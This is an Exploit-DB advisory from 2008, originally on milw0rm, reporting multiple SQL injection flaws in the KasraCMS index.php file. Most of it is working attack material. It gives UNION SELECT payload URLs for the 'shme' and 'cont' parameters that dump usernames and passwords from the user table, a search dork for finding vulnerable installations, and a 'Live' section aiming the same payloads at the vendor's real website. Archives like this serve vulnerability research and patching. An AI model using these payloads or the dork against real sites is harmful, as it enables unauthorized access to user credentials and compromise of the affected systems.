Kasra CMS - 'index.php' Multiple SQL Injections

EDB-ID:

6837

CVE:


Author:

G4N0K

Type:

webapps

Platform:

PHP

Published:

2008-10-25

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script: KasraCMS
[~] Language : PHP
[~] WebSite: http://kasracms.com
[~] affected File: index.php
[~] Type : Commercial
[~] Report-Date : 25/10/2008


--[ DoRK ]--
intext:"2007-2008 Kasra ICT"


--[ Founder ]--
G4N0K <mail.ganok[at]gmail.com>


--[ Exploit ]--
[~] http://localhost/[path]/index.php?shme=-63 UNION ALL SELECT
0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--
[~] http://localhost/[path]/index.php?cont=-63 UNION ALL SELECT
0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--


--[ L!ve ]--
http://kasracms.com/index.php?cont=-63 UNION ALL SELECT
0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--
http://kasracms.com/index.php?shme=-63 UNION ALL SELECT
0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--


--[ Greetz ]--
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//ALLAH, forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-10-25]